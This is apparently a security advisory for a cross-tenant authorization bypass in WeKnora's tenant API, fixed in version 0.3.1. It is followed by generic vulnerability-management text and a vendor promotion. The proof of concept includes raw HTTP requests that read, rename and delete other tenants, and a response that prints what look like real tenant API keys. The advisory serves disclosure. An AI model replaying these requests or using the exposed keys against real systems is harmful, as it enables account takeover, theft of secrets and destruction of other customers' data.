An authorization bypass in tenant management endpoints of WeKnora application allows any authenticated user to read, modify, or delete any tenant by ID. Since account registration is open to the public, this vulnerability allows any unauthenticated attacker to register an account and subsequently exploit the system. This enables cross-tenant account takeover and destruction, making the impact critical.
The tenant management handlers do not validate that the caller owns the tenant or has cross-tenant privileges. The handlers parse the tenant ID from the path and directly call the service layer with that ID, returning or mutating the tenant without authorization checks.
Affected handlers:
GET /api/v1/tenants lists all tenants without ownership checksGET /api/v1/tenants/{id} reads any tenant by ID without ownership checksPUT /api/v1/tenants/{id} allows updating any tenant by ID without ownership checksDELETE /api/v1/tenants/{id} allows deleting any tenant by ID without ownership checksThese endpoints do not enforce cross-tenant permissions or deny-by-default behavior, unlike ListAllTenants and SearchTenants.
Register a new account as a user in Tenant 10025 and obtain a bearer token or API key.
Read details of other tenants:
Request that uses API key via the X-API-Key header:
GET /api/v1/tenants HTTP/1.1
Host: localhost
Connection: keep-alive
X-Request-ID: 2TpH2S0sHyi1
X-API-Key: sk--HmGzVTrUW-p334ddZzJnucebiWBZ63AH5qKVO0EY4QNrELd
sec-ch-ua-platform: "macOS"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://weknora.serviceme.top/platform/knowledge-bases
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Response (truncated for brevity):
HTTP/1.1 200 OK
Server: nginx/1.28.0
Date: Fri, 06 Feb 2026 03:12:22 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Request-Id: 2TpH2S0sHyi1
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Referrer-Policy: strict-origin-when-cross-origin
{
"data": {
"items": [
{
"id": 10025,
"name": "injokerr's Workspace",
"api_key": "sk--HmGzVTrUW-p334ddZzJnucebiWBZ63AH5qKVO0EY4QNrELd",
"status": "active"
},
{
"id": 10001,
"name": "viaim_yuweilong",
"api_key": "sk-hocFTPZIYW9ixuUNbFidgSQ5eciSVcJkzE8Ns3BI6Ev-8cFe",
"status": "active"
}
]
},
"success": true
}
...
With API keys, we can do anything on the victim account's behalf, including reading sensitive data (LLM API keys, knowledge bases), modifying configurations, etc.
Requests to perform modification and deletion of another tenant.
Request:
PUThttp://localhost:8088/api/v1/tenants/10001Authorization: Bearer <ATTACKER_TOKEN>{ "name": "HACKED by tenant 10025" }Expected response:
200 OK with the updated tenant object.Request:
DELETEhttp://localhost:8088/api/v1/tenants/10001Authorization: Bearer <ATTACKER_TOKEN>Expected response:
200 OK and the tenant is deleted.This is a Broken Access Control (BOLA/IDOR) vulnerability in tenant management of WeKnora. Any user can access, modify, or delete tenants belonging to other customers, resulting in cross-tenant data exposure, account takeover, and destructive actions against other tenants. Moreover, when the account is taken over, attacker can read configured models to unauthorizedly extract sensitive data such as API keys of LLM services.
| Software | From | Fixed in |
|---|---|---|
github.com/Tencent/WeKnora
|
- | 0.3.1 |
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.